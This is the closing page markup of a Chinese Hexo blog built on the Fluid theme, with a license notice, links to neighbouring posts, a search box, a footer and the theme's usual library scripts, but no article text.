                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/11/11/CSAPP/04-BufferLab/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">04-BufferLab</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/11/08/%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/Linux%E4%BB%A3%E7%90%86%E9%85%8D%E7%BD%AE/">
                        <span class="hidden-mobile">Linux代理配置</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  










  

  
    <!-- KaTeX -->
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0/dist/katex.min.css" />
  











<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
